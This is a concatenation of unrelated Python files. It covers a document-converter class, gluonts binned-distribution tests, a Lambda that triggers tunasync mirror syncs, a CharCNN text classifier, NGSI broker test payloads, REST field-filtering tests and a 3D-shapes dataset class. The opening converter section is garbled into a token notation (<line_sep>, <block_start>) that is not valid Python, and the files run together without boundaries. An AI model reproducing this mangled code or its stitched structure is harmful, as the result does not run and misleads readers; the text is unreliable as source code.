'run')})<line_sep>@property<def_stmt>code self<block_start>code=self._code<if_stmt>code<is><not><none><block_start><return>code<block_end>code='\n'.join(self.code_lines)<line_sep>self._code=code<line_sep><return>code<block_end><def_stmt>finalize_after_copy self<block_start>''' Finalize options. This can be redefined by subclasses so that they can modify themselves based on inherited 'lang' or 'show'. '''<line_sep>self.options.finalize_after_copy()<block_end><def_stmt>copy_code self<block_start>''' Copy code for 'copy' option. Code is copied before execution, which is more flexible. Output (stdout, stderr, expr) must be copied separately after execution. 
This should only be invoked for a code chunk with no source errors, with copy targets that all exist and have no source errors. '''<line_sep>copy_chunks=self.copy_chunks<if_stmt>any(cc.is_expr<for>cc copy_chunks)<block_start><if_stmt>len(copy_chunks)<g>1<block_start>invalid_cc_names=', '.join(cc.options['name']<for>cc copy_chunks<if>cc.is_expr)<line_sep>self.source_errors.append('Cannot copy multiple code chunks when some are expressions: {0}'.format(invalid_cc_names))<block_end><if_stmt>self.command<in>('paste' 'code')# Some commands inherit expression status. The code command # inherits so that subsequent copying doesn't result in # incorrectly concatenated expressions. Since the code # command never has output, this has no display side effects. <block_start>self.is_expr=<true><line_sep>self.expr_lines=<none><block_end><elif_stmt><not>self.is_expr<block_start>self.source_errors.append('A non-expression command cannot copy an expression code chunk')<block_end><block_end><elif_stmt>self.is_expr<block_start>self.source_errors.append('An expression command cannot copy a non-expression code chunk')<block_end><if_stmt>self.source_errors<block_start><return><block_end># Finalization must come after any potential `.is_expr` modifications self.finalize_after_copy()<if_stmt>self.inline<and>'code'<in>self.options['show']<and>(len(copy_chunks)<g>1<or>len(copy_chunks[0].code_lines)<g>1)<block_start>self.source_errors.append('Cannot copy and then display multiple lines of code in an inline context')<line_sep><return><block_end><if_stmt>len(copy_chunks)<eq>1<block_start>self.code_lines=copy_chunks[0].code_lines<block_end><else_stmt><block_start>self.code_lines=[line<for>x copy_chunks<for>line x.code_lines]<block_end><if_stmt>self.command<eq>'paste'<block_start><if_stmt>all(cc.command<eq>'code'<for>cc copy_chunks)# When possible, simplify the copying resolution process 
<block_start>self.has_output=<true><block_end><block_end>self.code_start_line_number=copy_chunks[0].code_start_line_number<block_end><def_stmt>copy_output self<block_start>''' Copy output (stdout, stderr, expr) for 'copy' option. This must be copied separately from code, after execution. This should only be invoked for a code chunk with no source errors, with copy targets that all exist and have no source errors. '''<if_stmt>self.command<ne>'paste'<block_start><raise>TypeError<block_end>copy_chunks=self.copy_chunks<line_sep># The case of all code chunks being code commands has already been # handled in `copy_code()` <if_stmt>any(cc.command<eq>'paste'<for>cc copy_chunks)<block_start><if_stmt>len(copy_chunks)<g>1<block_start><if_stmt>all(cc.command<eq>'paste'<for>cc copy_chunks)<block_start>self.source_errors.append('Can only copy a single paste code chunk; cannot combine multiple paste chunks')<block_end><else_stmt><block_start>self.source_errors.append('Cannot copy a mixture of paste and other code chunks')<block_end><block_end><block_end><elif_stmt>any(cc.execute<for>cc copy_chunks)<block_start><if_stmt><not>all(cc.execute<for>cc copy_chunks)<block_start>self.source_errors.append('Copying output of multiple code chunks requires that all or none are executed')<block_end><elif_stmt>len(copy_chunks)<g>1<block_start><if_stmt>len(set(cc.session_obj<for>cc copy_chunks))<g>1<block_start>self.source_errors.append('Cannot copy output from code chunks in multiple sessions')<block_end><elif_stmt>any(ccx.session_index<ne>ccy.session_index-1<for>ccx,ccy zip(copy_chunks[:-1] copy_chunks[1:]))<block_start><if_stmt>any(ccx<is>ccy<for>ccx,ccy zip(copy_chunks[:-1] copy_chunks[1:]))<block_start>self.source_errors.append('Cannot copy output of a single code chunk multiple times')<block_end><elif_stmt>any(ccx.session_index<g>ccy.session_index<for>ccx,ccy zip(copy_chunks[:-1] copy_chunks[1:]))<block_start>self.source_errors.append('Cannot copy output of code chunks out of 
order')<block_end><else_stmt><block_start>self.source_errors.append('Cannot copy output of code chunks when some chunks in a sequence are omitted')<block_end><block_end><block_end><block_end><else_stmt><block_start><raise>ValueError<block_end><if_stmt>self.source_errors# If errors, discard what has already been copied <block_start>self.code_lines=<none><line_sep><return><block_end><if_stmt>len(copy_chunks)<eq>1<block_start>self.stdout_lines=copy_chunks[0].stdout_lines<line_sep>self.stderr_lines=copy_chunks[0].stderr_lines<line_sep>self.repl_lines=copy_chunks[0].repl_lines<line_sep>self.rich_output=copy_chunks[0].rich_output<block_end><else_stmt><block_start>self.stdout_lines=[line<for>x copy_chunks<if>x.stdout_lines<is><not><none><for>line x.stdout_lines]<or><none><line_sep>self.stderr_lines=[line<for>x copy_chunks<if>x.stderr_lines<is><not><none><for>line x.stderr_lines]<or><none><line_sep>self.repl_lines=[line<for>x copy_chunks<if>x.repl_lines<is><not><none><for>line x.repl_lines]<or><none><line_sep>self.rich_output=[ro<for>x copy_chunks<if>x.rich_output<is><not><none><for>ro x.rich_output]<or><none><block_end><if_stmt>self.is_expr# expr compatibility has already been checked in `copy_code()` <block_start>self.expr_lines=copy_chunks[0].expr_lines<block_end>self.stdout_start_line_number=copy_chunks[0].stdout_start_line_number<line_sep>self.stderr_start_line_number=copy_chunks[0].stderr_start_line_number<line_sep>self.has_output=<true><block_end><def_stmt>layout_output self output_type output_format lines=<none><block_start>''' Layout all forms of output, except for rich output that is not text/plain, by performing operations such as line rewrapping and tab expansion. If `lines` is supplied, it is used. Otherwise, the default lines (if any) are accessed for the specified output type. 
'''<if_stmt>lines<is><not><none><block_start><if_stmt><not>lines<and>output_format<eq>'verbatim_or_empty'<block_start>lines=['\xa0']<block_end><pass><block_end><elif_stmt>output_type<eq>'code'<block_start>lines=self.code_lines<block_end><elif_stmt>output_type<eq>'repl'<block_start>lines=self.repl_lines<block_end><elif_stmt>output_type<in>('expr' 'stdout' 'stderr')<block_start>lines=getattr(self output_type+'_lines')<if_stmt>lines<is><none><and>output_format<eq>'verbatim_or_empty'<block_start>lines=['\xa0']<block_end><block_end><elif_stmt>output_type<eq>'markup'<block_start>lines=self.as_markup_lines<block_end><elif_stmt>output_type<eq>'example_markup'<block_start>lines=self.as_example_markup_lines<block_end><elif_stmt>output_type<eq>'copied_markup'<block_start><if_stmt>len(self.copy_chunks)<eq>1<block_start>lines=self.copy_chunks[0].as_markup_lines<block_end><elif_stmt>self.inline<block_start>lines=[]<for_stmt>cc self.copy_chunks<block_start>lines.extend(cc.as_markup_lines)<block_end><block_end><else_stmt><block_start>lines=[]<line_sep>last_cc=self.copy_chunks[-1]<for_stmt>cc self.copy_chunks<block_start>lines.extend(cc.as_markup_lines)<if_stmt>cc<is><not>last_cc<block_start>lines.append('')<block_end><block_end><block_end><block_end><else_stmt><block_start><raise>ValueError<block_end>rewrap_lines=self.options.get(output_type+'_rewrap_lines' <false>)<line_sep>rewrap_width=self.options.get(output_type+'_rewrap_width' 78)<line_sep>expand_tabs=self.options.get(output_type+'_expand_tabs' <false>)<line_sep>tab_size=self.options.get(output_type+'_tab_size' 8)<line_sep># This should be rewritten once rewrapping design is finalized, since # textwrap doesn't necessarily do everything as might be desired, and # the use of textwrap could be optimized if it continues to be used. # Nothing is done yet with tabs. 
<if_stmt>rewrap_lines<block_start>new_lines=[]<for_stmt>line lines<block_start><if_stmt><not>line<block_start>new_lines.append(line)<line_sep><continue><block_end>line_stripped=line.lstrip(' \t')<line_sep>indent=line[:len(line)-len(line_stripped)]<line_sep>new_lines.extend(textwrap.wrap(line_stripped width=rewrap_width-len(indent) initial_indent=indent subsequent_indent=indent))<block_end>lines=new_lines<block_end><if_stmt>self.inline<block_start><return>' '.join(lines)<block_end><return>'\n'.join(lines)<block_end><block_end><class_stmt>MetaConverter(type)<block_start>''' Metaclass for converters. Allows converters to register themselves by name and by compatible formats. '''<def_stmt>__init__ cls name bases dct<block_start><if_stmt><not>hasattr(cls '_registry')# Base Converter class <block_start>cls._registry={}<block_end><else_stmt># Subclass <block_start>cls._registry[name.lower()]=cls<if_stmt><not>all(attr<is><none><or>(isinstance(attr set)<and>attr<and>all(isinstance(x str)<for>x attr))<for>attr [cls.from_formats cls.multi_source_formats cls.to_formats])<block_start><raise>TypeError<block_end><if_stmt>(cls.from_formats<is><not><none><and>cls.multi_source_formats<is><not><none><and>cls.multi_source_formats-cls.from_formats)<block_start><raise>ValueError<block_end><block_end>super().__init__(name bases dct)<block_end><block_end><class_stmt>Converter(object)<block_start>''' Base class for converters. 
'''<line_sep>__metaclass__=MetaConverter<def_stmt>__init__ self * strings:Optional[Union[str Sequence[str]]]=<none> paths:Optional[Union[str Sequence[str] pathlib.Path Sequence[pathlib.Path]]]=<none> no_cache:Optional[bool]=<false> cache_path:Optional[Union[str pathlib.Path]]=<none> cross_source_sessions:bool=<true> expanduser:bool=<false> expandvars:bool=<false> from_format:Optional[str]=<none> session_defaults:Optional[Dict[str Union[bool str]]]=<none> synctex:bool=<false><block_start><if_stmt><not>all(isinstance(x bool)<for>x (cross_source_sessions expanduser expandvars))<block_start><raise>TypeError<block_end>self.cross_source_sessions=cross_source_sessions<line_sep>self.expanduser=expanduser<line_sep>self.expandvars=expandvars<line_sep>self.session_defaults=session_defaults<if_stmt>paths<is><not><none><and>strings<is><none><block_start><if_stmt>isinstance(paths str)<block_start>paths=[pathlib.Path(paths)]<block_end><elif_stmt>isinstance(paths pathlib.Path)<block_start>paths=[paths]<block_end><elif_stmt>isinstance(paths collections.abc.Sequence)<and>paths<block_start><if_stmt>all(isinstance(x str)<for>x paths)<block_start>paths=[pathlib.Path(x)<for>x paths]<block_end><elif_stmt><not>all(isinstance(x pathlib.Path)<for>x paths)<block_start><raise>TypeError<block_end><block_end><else_stmt><block_start><raise>TypeError<block_end>self.raw_source_paths=paths<line_sep># Names are based on paths BEFORE any expansion source_names=[p.as_posix()<for>p paths]<if_stmt><not>all(isinstance(x bool)<for>x (expanduser expandvars))<block_start><raise>TypeError<block_end><if_stmt>expandvars<block_start>paths=[pathlib.Path(os.path.expandvars(str(p)))<for>p paths]<block_end><if_stmt>expanduser<block_start>paths=[p.expanduser()<for>p paths]<block_end>self.expanded_source_paths=collections.OrderedDict(zip(source_names paths))<line_sep>source_strings=[]<for_stmt>p 
paths<block_start><try_stmt><block_start>source_string=p.read_text(encoding='utf_8_sig')<block_end><except_stmt>Exception<as>e<block_start><if_stmt><not>p.is_file()<block_start><raise>ValueError('File "{0}" does not exist'.format(p))<block_end><raise>ValueError('Failed to read file "{0}":\n {1}'.format(p e))<block_end><if_stmt><not>source_string<block_start>source_string='\n'<block_end>source_strings.append(source_string)<block_end>self.sources=collections.OrderedDict(zip(source_names source_strings))<if_stmt>self.from_formats<is><not><none><block_start><if_stmt>from_format<is><none><block_start><try_stmt><block_start>source_formats=set([self._file_extension_to_format_dict[p.suffix]<for>p paths])<block_end><except_stmt>KeyError<block_start><raise>TypeError('Cannot determine document format from file extensions, or unsupported format')<block_end>from_format=source_formats.pop()<if_stmt>source_formats<block_start><raise>TypeError('Cannot determine unambiguous document format from file extensions')<block_end><block_end><if_stmt>from_format<not><in>self.from_formats<block_start><raise>ValueError('Unsupported document format {0}'.format(from_format))<block_end><block_end>self.from_format=from_format<block_end><elif_stmt>strings<is><not><none><and>paths<is><none><block_start><if_stmt><not>all(x<is><false><for>x (expanduser expandvars))<block_start><if_stmt><not>all(isinstance(x bool)<for>x (expanduser expandvars))<block_start><raise>TypeError<block_end><raise>ValueError<block_end><if_stmt>isinstance(strings str)<block_start>strings=[strings]<block_end><elif_stmt><not>(isinstance(strings collections.abc.Sequence)<and>strings<and>all(isinstance(x str)<for>x strings))<block_start><raise>TypeError<block_end># Normalize newlines, as if read from file with universal newlines source_strings=[io.StringIO(s newline=<none>).read()<or>'\n'<for>s 
strings]<if_stmt>len(strings)<eq>1<block_start>source_names=['<string>']<block_end><else_stmt><block_start>source_names=['<string({0})>'.format(n+1)<for>n range(len(strings))]<block_end>self.sources=collections.OrderedDict(zip(source_names source_strings))<line_sep>self.raw_source_paths=<none><line_sep>self.expanded_source_paths=<none><if_stmt>from_format<is><none><block_start><raise>TypeError('Document format is required')<block_end><if_stmt>self.from_formats<is><not><none><and>from_format<not><in>self.from_formats<block_start><raise>ValueError('Unsupported document format {0}'.format(from_format))<block_end>self.from_format=from_format<block_end><else_stmt><block_start><raise>TypeError<block_end><if_stmt>len(self.sources)<g>1<and>from_format<not><in>self.multi_source_formats<block_start><raise>TypeError('Multiple sources are not supported for format {0}'.format(from_format))<block_end><if_stmt><not>isinstance(no_cache bool)<block_start><raise>TypeError<block_end>self.no_cache=no_cache<if_stmt>cache_path<is><none><block_start>cache_path=pathlib.Path('_codebraid')<block_end><elif_stmt>isinstance(cache_path str)<block_start>cache_path=pathlib.Path(cache_path)<block_end><elif_stmt><not>isinstance(cache_path pathlib.Path)<block_start><raise>TypeError<block_end><if_stmt>expandvars<block_start>cache_path=pathlib.Path(os.path.expandvars(cache_path.as_posix()))<block_end><if_stmt>expanduser<block_start>cache_path=cache_path.expanduser()<block_end>self.cache_path=cache_path<if_stmt>sys.version_info<l>(3 6)<block_start>cache_key_hasher=hashlib.sha512()<block_end><else_stmt><block_start>cache_key_hasher=hashlib.blake2b()<block_end><if_stmt>self.expanded_source_paths<is><none><block_start>cache_source_paths=<none><line_sep>cache_key_hasher.update(b'<string>')<block_end><else_stmt><block_start>cache_source_paths=[]<for_stmt>p 
self.expanded_source_paths.values()<block_start><try_stmt><block_start>p_final=pathlib.Path('~')/p.absolute().relative_to(pathlib.Path.home())<block_end><except_stmt>ValueError<block_start>p_final=p.absolute()<block_end>cache_source_paths.append(p_final)<line_sep>cache_key_hasher.update(p_final.as_posix().encode('utf8'))<line_sep>cache_key_hasher.update(cache_key_hasher.digest())<block_end><block_end>self.cache_source_paths=cache_source_paths<line_sep>self.cache_key=cache_key_hasher.hexdigest()[:16]<line_sep>self._io_map=<false><if_stmt><not>isinstance(synctex bool)<block_start><raise>TypeError<block_end>self.synctex=synctex<if_stmt>synctex<block_start>self._io_map=<true><block_end>self.code_chunks=[]<line_sep>self.code_options={}<block_end>from_formats=<none><line_sep>to_formats=<none><line_sep>multi_source_formats=<none><line_sep>_file_extension_to_format_dict={'.md':'markdown' '.markdown':'markdown' '.tex':'latex' '.ltx':'latex'}<def_stmt>code_braid self<block_start>self._extract_code_chunks()<line_sep>self._process_code_chunks()<line_sep>self._postprocess_code_chunks()<block_end><def_stmt>_extract_code_chunks self<block_start><raise>NotImplementedError<block_end><def_stmt>_process_code_chunks self<block_start>cp=codeprocessors.CodeProcessor(code_chunks=self.code_chunks code_options=self.code_options cross_source_sessions=self.cross_source_sessions no_cache=self.no_cache cache_path=self.cache_path cache_key=self.cache_key cache_source_paths=self.cache_source_paths session_defaults=self.session_defaults)<line_sep>cp.process()<block_end><def_stmt>_postprocess_code_chunks self<block_start><raise>NotImplementedError<block_end><def_stmt>convert self * to_format<block_start><raise>NotImplementedError<block_end><def_stmt>_save_synctex_data self data<block_start>zip_path=self.cache_path/'synctex.zip'<with_stmt>zipfile.ZipFile(str(zip_path) 'w' compression=zipfile.ZIP_DEFLATED)<as>zf<block_start>zf.writestr('synctex.json' json.dumps(data))<block_end><block_end><block_end>
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.

import itertools

import mxnet as mx
import numpy as np
import pytest

from gluonts.mx.distribution import Binned, BinnedOutput

# Shared constructor kwargs: a batch of 2 identical rows with 7 bins each.
# Probabilities are stored in log space, as Binned expects.
COMMON_KWARGS = {
    "bin_log_probs": mx.nd.array([[0.1, 0.2, 0.1, 0.05, 0.2, 0.1, 0.25]])
    .log()
    .repeat(axis=0, repeats=2),
    "bin_centers": mx.nd.array([[-5, -3, -1.2, -0.5, 0, 0.1, 0.2]]).repeat(
        axis=0, repeats=2
    ),
}


@pytest.fixture
def labels():
    # Shape (T, N): two random labels drawn from the support of the bins.
    return mx.random.uniform(low=-6, high=1, shape=(2,))


@pytest.mark.parametrize(
    "K,alpha", itertools.product([1000, 10000, 100000], [0.001, 0.01, 0.1])
)
def test_smooth_mask_adds_to_one(K, alpha):
    """A smoothed one-hot mask must remain a valid probability vector."""
    uniform_log_probs = mx.nd.log_softmax(mx.nd.ones(K))
    centers = mx.nd.arange(K)
    dist = Binned(
        bin_log_probs=uniform_log_probs,
        bin_centers=centers,
        label_smoothing=0.2,
    )
    labels = mx.random.uniform(low=0, high=K, shape=(12,)).expand_dims(-1)
    hard_mask = dist._get_mask(labels)
    soft_mask = dist._smooth_mask(mx.nd, hard_mask, alpha=mx.nd.array([alpha]))
    # Every row of the smoothed mask still sums to one.
    assert np.allclose(
        soft_mask.asnumpy().sum(axis=-1), np.ones(12), atol=1e-6
    )


def test_get_smooth_mask_correct(labels):
    """Smoothing keeps row sums, keeps the peak, and floors entries at alpha/K."""
    smoothing = Binned(**COMMON_KWARGS, label_smoothing=0.2)
    plain = Binned(**COMMON_KWARGS)
    labels = labels.expand_dims(-1)
    hard_mask = smoothing._get_mask(labels)
    # label_smoothing must not change the hard (one-hot) mask itself.
    assert np.allclose(hard_mask.asnumpy(), plain._get_mask(labels).asnumpy())
    soft_mask = smoothing._smooth_mask(mx.nd, hard_mask, alpha=mx.nd.array([0.2]))
    soft_np = soft_mask.asnumpy()
    hard_np = hard_mask.asnumpy()
    # Rows still add up to one.
    assert np.allclose(soft_np.sum(axis=-1), np.ones(2))
    # The peak stays on the labelled bin.
    assert np.allclose(
        np.argmax(soft_np, axis=-1),
        np.argmax(hard_np, axis=-1),
    )
    # Off-peak entries are raised to exactly alpha / K.
    assert np.allclose(soft_np.min(axis=-1), np.ones(2) * 0.2 / 7)


def test_loss_correct(labels):
    """alpha == 0 must reproduce the unsmoothed loss; alpha > 0 must change it."""
    with_alpha = Binned(**COMMON_KWARGS, label_smoothing=0.4)
    zero_alpha = Binned(**COMMON_KWARGS, label_smoothing=0.0)
    baseline = Binned(**COMMON_KWARGS)
    assert np.allclose(
        baseline.loss(labels).asnumpy(), zero_alpha.loss(labels).asnumpy()
    )
    assert not np.allclose(
        baseline.loss(labels).asnumpy(), with_alpha.loss(labels).asnumpy()
    )


@pytest.mark.parametrize("hybridize", [True, False])
def test_output_sets_alpha(labels, hybridize):
    """BinnedOutput must forward label_smoothing to the distribution it builds."""
    binned_output = BinnedOutput(
        bin_centers=COMMON_KWARGS["bin_centers"][0], label_smoothing=0.35
    )
    arg_proj = binned_output.get_args_proj()
    if hybridize:
        arg_proj.hybridize()
    arg_proj.initialize()
    dist = binned_output.distribution(arg_proj(mx.nd.random.uniform(2, 10)))
    assert dist.label_smoothing == 0.35
import json
import urllib3
import os
import logging

logger = logging.getLogger()
logger.setLevel(logging.INFO)

# One pool manager reused across warm Lambda invocations.
http = urllib3.PoolManager()

# Base URL of the tunasync manager; required, so fail fast at import time.
tunasync_manager_url = os.environ['TUNASYNC_MANAGER_URL']


def handler(event, context):
    """Lambda entry point: ask the tunasync manager to start a mirror sync.

    Args:
        event: trigger payload; must carry the mirror name under ``'repo'``.
        context: Lambda runtime context (unused).

    Sends ``POST {manager}/cmd`` with a JSON body; failures are logged and
    swallowed so a manager outage does not crash the function.
    """
    logger.info(event)
    request_url = tunasync_manager_url + '/cmd'
    request_body = {
        'cmd': 'start',
        'worker_id': 'tunasync-worker',
        'mirror_id': event['repo'],
    }
    body = json.dumps(request_body)
    logger.info("Request body:\n%s", body)
    # Encode once: Content-Length must be the BYTE length of the payload,
    # not the character count (str(len(body)) was wrong for non-ASCII names).
    encoded_body = body.encode('utf-8')
    headers = {
        'content-type': 'application/json',
        'content-length': str(len(encoded_body)),
    }
    try:
        response = http.request(
            'POST', request_url, body=encoded_body, headers=headers, retries=False
        )
        logger.info("Status code: %s", response.status)
    except Exception as e:
        # Deliberately best-effort: log and return instead of raising.
        logger.error("Unable to send request to Tunasync manager")
        logger.exception(e)
# !/usr/bin/python
# -*- coding: utf-8 -*-
# @time     : 2020/5/7 21:06
# @author   : Mo
# @function: CharCNN [Character-level Convolutional Networks for Text Classification](https://arxiv.org/pdf/1509.01626.pdf)


from macadam.base.graph import graph
from macadam import K, L, M, O


class CharCNNGraph(graph):
    """Character-level CNN classifier (Zhang et al., 2015)."""

    def __init__(self, hyper_parameters):
        """Read CharCNN-specific hyper-parameters, then build via the base class.

        Args:
            hyper_parameters: dict; under "graph" it may define
                - char_cnn_layers: list of [filters, kernel_size, pool_size];
                  pool_size == -1 means "no pooling after this conv block".
                - full_connect_layers: widths of the dense head layers.
                - threshold: ThresholdedReLU cut-off.
        """
        self.char_cnn_layers = hyper_parameters.get("graph", {}).get(
            "char_cnn_layers",
            [[256, 7, 3], [256, 7, 3], [256, 3, -1],
             [256, 3, -1], [256, 3, -1], [256, 3, 3]],
        )
        self.full_connect_layers = hyper_parameters.get("graph", {}).get(
            "full_connect_layers", [1024, 1024]
        )
        self.threshold = hyper_parameters.get("graph", {}).get("threshold", 1e-6)
        super().__init__(hyper_parameters)

    def build_model(self, inputs, outputs):
        """Assemble conv/pool stacks, a dense head, and the softmax layer.

        Args:
            inputs: model input tensor(s) from the base graph.
            outputs: embedding output tensor the conv stack consumes.
        """
        # Stacked conv blocks: each convolution consumes the PREVIOUS block's
        # output. (The original applied every Conv1D to the embedding
        # `outputs`, so all but the last conv/pool block were discarded —
        # contradicting the stacked architecture of the cited paper.)
        x = outputs
        for filters, kernel_size, pool_size in self.char_cnn_layers:
            x = L.Convolution1D(filters=filters, kernel_size=kernel_size)(x)
            x = L.ThresholdedReLU(self.threshold)(x)
            if pool_size != -1:
                # NOTE(review): strides=1 gives overlapping pooling; the paper
                # uses non-overlapping pooling (stride == pool size) — kept
                # as-is to avoid changing tensor shapes, confirm intent.
                x = L.MaxPooling1D(pool_size=pool_size, strides=1)(x)
        x = L.Flatten()(x)
        # Fully connected head.
        for units in self.full_connect_layers:
            x = L.Dense(units=units)(x)
            x = L.ThresholdedReLU(self.threshold)(x)
            x = L.Dropout(self.dropout)(x)
        # Classification layer (label count / activation from the base graph).
        self.outputs = L.Dense(units=self.label, activation=self.activate_end)(x)
        self.model = M.Model(inputs=inputs, outputs=self.outputs)
        self.model.summary(132)
# NGSI v2 subscription payload used by the broker tests: watch attribute p3 of
# entity Room1 and push notifications for p1/p2/p3 to a local HTTP endpoint.
subscription_data = {
    "description": "A subscription to get info about Room1",
    "subject": {
        "entities": [{
            "id": "Room1",
            "type": "Room",
        }],
        "condition": {
            "attrs": ["p3"],
        },
    },
    "notification": {
        "http": {
            "url": "http://192.168.100.162:8888",
        },
        "attrs": ["p1", "p2", "p3"],
    },
    "expires": "2040-01-01T14:00:00.00Z",
    "throttling": 5,
}

# data to test the following code for broker.thinBroker.go:946
'''
subReqv2 := SubscriptionRequest{}
	err := r.DecodeJsonPayload(&subReqv2)
	if err != nil {
		rest.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
'''
# Same subscription as above, but with an extra "ispattern" key inside the
# entity element — an invalid field for the v2 payload decoder under test.
subscriptionWrongPaylaod = {
    "description": "A subscription to get info about Room1",
    "subject": {
        "entities": [{
            "id": "Room1",
            "type": "Room",
            "ispattern": "false",
        }],
        "condition": {
            "attrs": ["p3"],
        },
    },
    "notification": {
        "http": {
            "url": "http://192.168.100.162:8888",
        },
        "attrs": ["p1", "p2", "p3"],
    },
    "expires": "2040-01-01T14:00:00.00Z",
    "throttling": 5,
}

# NGSI v1 subscription: entity list plus a callback reference URL.
v1SubData = {
    "entities": [{
        "id": "Room1",
        "type": "Room",
    }],
    "reference": "http://192.168.100.162:8668/ngsi10/updateContext",
}

# updateContext payload exercising updateAction == UPDATE.
updateDataWithupdateaction = {
    "contextElements": [{
        "entityId": {
            "id": "Room1",
            "type": "Room",
        },
        "attributes": [
            {"name": "p1", "type": "float", "value": 60},
            {"name": "p3", "type": "float", "value": 69},
            {"name": "p2", "type": "float", "value": 32},
        ],
        "domainMetadata": [{
            "name": "location",
            "type": "point",
            "value": {"latitude": 49.406393, "longitude": 8.684208},
        }],
    }],
    "updateAction": "UPDATE",
}

# updateContext payload for the create case.
# NOTE(review): "CRETAE" looks like a typo for "CREATE" — confirm whether the
# broker test intentionally relies on this exact (invalid) value before fixing.
createDataWithupdateaction = {
    "contextElements": [{
        "entityId": {
            "id": "Room1",
            "type": "Room",
        },
        "attributes": [
            {"name": "p1", "type": "float", "value": 90},
            {"name": "p3", "type": "float", "value": 70},
            {"name": "p2", "type": "float", "value": 12},
        ],
        "domainMetadata": [{
            "name": "location",
            "type": "point",
            "value": {"latitude": 49.406393, "longitude": 8.684208},
        }],
    }],
    "updateAction": "CRETAE",
}

# updateContext payload exercising updateAction == DELETE.
deleteDataWithupdateaction = {
    "contextElements": [{
        "entityId": {
            "id": "Room1",
            "type": "Room",
        },
        "attributes": [
            {"name": "p1", "type": "float", "value": 12},
            {"name": "p3", "type": "float", "value": 13},
            {"name": "p2", "type": "float", "value": 14},
        ],
        "domainMetadata": [{
            "name": "location",
            "type": "point",
            "value": {"latitude": 49.406393, "longitude": 8.684208},
        }],
    }],
    "updateAction": "DELETE",
}
from rest_framework.test import APIClient

from tests.app.serializers import QuoteSerializer
from tests.utils import decode_content


def _get_content(url):
    """GET *url* through the test client and return the decoded payload."""
    return decode_content(APIClient().get(url))


def test_list_response_unfiltered():
    assert _get_content('/quotes/') == [
        {
            'character': 'Customer',
            'line': "It's certainly uncontaminated by cheese",
            'sketch': 'CHEESE SHOP',
        },
        {
            'character': 'The Black Knight',
            'line': "It's just a flesh wound",
            'sketch': 'HOLY GRAIL',
        },
    ]


def test_detail_response_unfiltered():
    assert _get_content('/quotes/parrot/') == {
        'character': 'Shopkeeper',
        'line': "Well, he's...he's, ah...probably pining for the fjords",
        'sketch': 'PET SHOP',
    }


def test_list_response_filtered_includes():
    assert _get_content('/quotes/?fields=character,line') == [
        {
            'character': 'Customer',
            'line': "It's certainly uncontaminated by cheese",
        },
        {
            'character': 'The Black Knight',
            'line': "It's just a flesh wound",
        },
    ]


def test_detail_response_filtered_includes():
    assert _get_content('/quotes/parrot/?fields=character,line') == {
        'character': 'Shopkeeper',
        'line': "Well, he's...he's, ah...probably pining for the fjords",
    }


def test_list_response_filtered_excludes():
    assert _get_content('/quotes/?fields!=character') == [
        {
            'line': "It's certainly uncontaminated by cheese",
            'sketch': 'CHEESE SHOP',
        },
        {
            'line': "It's just a flesh wound",
            'sketch': 'HOLY GRAIL',
        },
    ]


def test_detail_response_filtered_excludes():
    assert _get_content('/quotes/parrot/?fields!=character') == {
        'line': "Well, he's...he's, ah...probably pining for the fjords",
        'sketch': 'PET SHOP',
    }


def test_response_filtered_with_some_bogus_fields():
    # Unknown field names are silently ignored; known ones still apply.
    assert _get_content('/quotes/parrot/?fields=sketch,spam,eggs') == {
        'sketch': 'PET SHOP',
    }


def test_response_filtered_with_only_bogus_fields():
    assert _get_content('/quotes/parrot/?fields=blah') == {}


def test_response_filtered_with_multiple_fields_in_separate_query_args():
    assert _get_content('/quotes/parrot/?fields=character&fields=sketch') == {
        'character': 'Shopkeeper',
        'sketch': 'PET SHOP',
    }


def test_response_filtered_with_include_and_exclude():
    assert _get_content(
        '/quotes/parrot/?fields=character&fields=sketch&fields!=line'
    ) == {
        'character': 'Shopkeeper',
        'sketch': 'PET SHOP',
    }


def test_exclude_wins_for_ambiguous_filtering():
    assert _get_content('/quotes/parrot/?fields=line,sketch&fields!=line') == {
        'sketch': 'PET SHOP',
    }


def test_post_ignores_queryfields():
    # Ensures that fields aren't dropped for other types of request
    response = APIClient().post('/quotes/?fields=line,sketch')
    assert decode_content(response) == {
        'request_method': 'POST',
        'serializer_instance_fields': ['character', 'line', 'sketch'],
        'request_query': {'fields': 'line,sketch'},
    }


def test_instantiate_without_request_context():
    # just test that it doesn't crash or b0rk the serializer to omit request context
    payload = {
        'character': 'the character',
        'line': 'the line',
        'sketch': 'the sketch',
    }
    serializer = QuoteSerializer(data=payload)
    assert serializer.is_valid()
    assert sorted(serializer.get_fields()) == ['character', 'line', 'sketch']
import os
import logging

import numpy as np
from torch.utils import data

logger = logging.getLogger(__name__)


# Fields
class Field(object):
    ''' Data fields class. '''

    def load(self, data_path, idx, category):
        ''' Loads a data point.

        Args:
            data_path (str): path to data file
            idx (int): index of data point
            category (int): index of category
        '''
        raise NotImplementedError

    def check_complete(self, files):
        ''' Checks if set is complete.

        Args:
            files: files
        '''
        raise NotImplementedError


class Shapes3dDataset(data.Dataset):
    ''' 3D Shapes dataset class. '''

    def __init__(self, dataset_folder, fields, split=None, categories=None,
                 no_except=True, transform=None, shared_dict=None,
                 n_views=24, cache_fields=False, split_model_for_images=False):
        ''' Initialization of the the 3D shape dataset.

        Args:
            dataset_folder (str): dataset folder
            fields (dict): dictionary of fields
            split (str): which split is used
            categories (list): list of categories to use
            no_except (bool): no exception
            transform (callable): transformation applied to data points
            shared_dict (dict): shared dictionary (used for field caching);
                if None, a fresh per-instance cache is created.  (Previously
                the default was a mutable ``{}`` shared across *all*
                instances created without an explicit dict.)
            n_views (int): number of views (only relevant when using field
                caching)
            cache_fields (bool): whether to cache fields; this option can be
                useful for small overfitting experiments
            split_model_for_images (bool): whether to split a model by its
                views (can be relevant for small overfitting experiments to
                perform validation on all views)
        '''
        # Attributes
        self.dataset_folder = dataset_folder
        self.fields = fields
        self.no_except = no_except
        self.transform = transform
        self.cache_fields = cache_fields
        self.n_views = n_views
        # Avoid the mutable-default-argument pitfall: only share a cache
        # when the caller explicitly provides one.
        self.cached_fields = {} if shared_dict is None else shared_dict
        self.split_model_for_images = split_model_for_images

